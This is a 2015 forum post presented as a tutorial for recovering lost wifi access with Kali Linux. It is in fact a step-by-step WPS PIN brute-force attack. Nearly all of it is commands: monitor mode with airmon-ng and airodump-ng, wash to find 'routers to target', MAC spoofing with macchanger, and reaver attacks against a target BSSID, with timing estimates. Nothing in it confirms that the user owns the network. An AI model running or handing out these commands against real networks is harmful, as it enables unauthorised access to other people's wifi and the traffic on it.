PC & IT SUPPORT MADE EASY FORUM
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Recover lost wifi access with Kali Linux and this TUT! no password files needed!!!

Go down

Recover lost wifi access with Kali Linux and this TUT! no password files needed!!! Empty Recover lost wifi access with Kali Linux and this TUT! no password files needed!!!

Post by jamied_uk 4th April 2015, 19:30

Recover lost wifi access with Kali Linux and this TUT! no password files needed!!!

Credit goes to this guy!!!

https://youtu.be/Q_aSyg1Tykw





called How to hack WiFi WPA WPA2 - For Beginners - bruteforce with explanations in kali linux


How to!

Code:
airmon-ng start wlan0




Code:
airodump-ng mon0




Code:
wash -i mon0 

    (this is to find wps enabled routers to target)

(example)
Code:
reaver -i mon0 -b (target bssid) -S --no-nacks -d 7 -vv -c 2



(where c is chanel and d is a delay time and keep S capital!)


if they change pin use same command as the last command with a -p at the end to get the new key!

for example:

Code:
reaver -i mon0 -b (target bssid) -S --no-nacks -d 7 -vv -c 2 -p



(there wps pin aka WPA PSK if theyv not changed that your in again!)!


85 mins average time for a virtual machine! could take hours!!!


5109 is seconds it takes to crack around time!





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




Another way!!

https://www.youtube.com/watch?v=ZeV9Le_OMkc&list=PLVJX7Z63-fquS5cDZJUEqGz2pH1LlN_Vd&index=6


Code:
su



Code:
apt-get install -y aircrack-ng macchanger reaver





Disable Wireless Card -

Code:
ifconfig wlan0 down



Change Mac Address for Wireless Card -
Code:
macchanger -m 00:11:22:33:44:55 wlan0



Enable Wireless Card -




Code:
ifconfig wlan0 up



Enable Monitoring in Wireless Card -
Code:
airmon-ng start wlan0



Disable Monitoring Wireless Card -

Code:
ifconfig mon0 down



Change Mac Address for Monitoring Card -
Code:
macchanger -m 00:11:22:33:44:55 mon0



Enable Monitoring Card -


Code:
ifconfig mon0 up



Start Monitoring Card -


Code:
airodump-ng mon0



Stop Monitoring Card -

Press CTRL+C at the Same Time

Start Reaver Attack -

Code:
reaver -i mon0 -b (Router's IP Address) -vv --dh-small



Stop Reaver Attack -


Press CTRL+C at the Same Time
________________________________________­_______________
If There Are Any Errors:

START REAVER ATTACK WITH DELAY -


Code:
reaver -i mon0 -b (ROUTER'S IP ADDRESS) -vv -d 30



KILL A PROBLEMATIC PROCESS -











jamied_uk
jamied_uk
Admin

Posts : 2952
Join date : 2010-05-09
Age : 41
Location : UK

https://jnet.sytes.net

Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum